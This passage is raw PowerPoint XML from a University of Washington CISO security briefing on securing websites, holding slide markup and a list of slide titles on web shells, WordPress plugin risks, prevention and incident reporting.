            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90" name="Google Shape;90;p16">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528325" y="2750100"/>
            <a:ext cx="1714500" cy="85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2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C36155EF-39DC-40C2-8CBE-E8BE1E474BFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="-572700"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Office of the CISO Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="Google Shape;95;p17" descr="Screenshot of the Office of the Chief Information Security Officer website. Content includes Securing Devices at Home and Work, and News &amp; Alerts."/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="424750" y="177600"/>
            <a:ext cx="8429124" cy="48014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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426700" y="2054200"/>
            <a:ext cx="8395800" cy="73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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>
              </a:rPr>
              <a:t>What could go wrong?</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Encode Sans"/>
              <a:ea typeface="Encode Sans"/>
              <a:cs typeface="Encode Sans"/>
              <a:sym typeface="Encode Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="Google Shape;101;p18">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528325" y="2750100"/>
            <a:ext cx="1714500" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="UW Standard">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W Standard">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2031</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>256</Paragraphs>
  <Slides>39</Slides>
  <Notes>39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39</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="48" baseType="lpstr">
      <vt:lpstr>Encode Sans Condensed Thin</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Open Sans ExtraBold</vt:lpstr>
      <vt:lpstr>Encode Sans</vt:lpstr>
      <vt:lpstr>Open Sans SemiBold</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>UW Standard</vt:lpstr>
      <vt:lpstr>UW Standard</vt:lpstr>
      <vt:lpstr>Securing UW Websites: Threats &amp; Best Practices January 7, 2021 Office of the Chief Information Security Officer </vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Monthly InfoSec briefings </vt:lpstr>
      <vt:lpstr>Become a security advocate</vt:lpstr>
      <vt:lpstr>Alerts</vt:lpstr>
      <vt:lpstr>Threat Modeling in 3 Easy Steps</vt:lpstr>
      <vt:lpstr>What are you trying to do?</vt:lpstr>
      <vt:lpstr>Office of the CISO Website</vt:lpstr>
      <vt:lpstr>What could go wrong?</vt:lpstr>
      <vt:lpstr>WordPress Theme, Plugin 2020</vt:lpstr>
      <vt:lpstr>WordPress Theme, Plugin 2020 (2 of 2)</vt:lpstr>
      <vt:lpstr>Web Shells - Background</vt:lpstr>
      <vt:lpstr>Web Shells – Background (2 of 2)</vt:lpstr>
      <vt:lpstr>Web Shells</vt:lpstr>
      <vt:lpstr>Web Shells at UW</vt:lpstr>
      <vt:lpstr>Web Shells at UW (2 of 3)</vt:lpstr>
      <vt:lpstr>Web Shells at UW (3 of 3)</vt:lpstr>
      <vt:lpstr>Web Shell Effects</vt:lpstr>
      <vt:lpstr>What you can do about web shells</vt:lpstr>
      <vt:lpstr>What you can do about web shells (2 of 2)</vt:lpstr>
      <vt:lpstr>What can you do to reduce the likelihood of things going wrong?</vt:lpstr>
      <vt:lpstr>Prevention</vt:lpstr>
      <vt:lpstr>Prevention: useful questions</vt:lpstr>
      <vt:lpstr>Prevention: more useful questions</vt:lpstr>
      <vt:lpstr>Prevention: actions</vt:lpstr>
      <vt:lpstr>Prevention: monitor security alerts</vt:lpstr>
      <vt:lpstr>Securing your CMS</vt:lpstr>
      <vt:lpstr>Security plugin/modules: 1 of 2</vt:lpstr>
      <vt:lpstr>Security plugin/modules: 2 of 2 </vt:lpstr>
      <vt:lpstr>Developing secure themes/plugins</vt:lpstr>
      <vt:lpstr>More  info</vt:lpstr>
      <vt:lpstr>Something has gone wrong. Now what?</vt:lpstr>
      <vt:lpstr>Reporting Incidents</vt:lpstr>
      <vt:lpstr>Resources</vt:lpstr>
      <vt:lpstr>Check out CISO training resources</vt:lpstr>
      <vt:lpstr>Become a security advocate (2 of 2)</vt:lpstr>
      <vt:lpstr>Take a secure coding class</vt:lpstr>
      <vt:lpstr>Resources (2 of 2)</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Securing UW Websites: Threats &amp; Best Practices January 7, 2021 Office of the Chief Information Security Officer</dc:title>
  <dc:creator>Anna Marie Golden</dc:creator>
  <cp:lastModifiedBy>A.M. Golden</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-13T20:05:17Z</dcterms:modified>
</cp:coreProperties>
</file>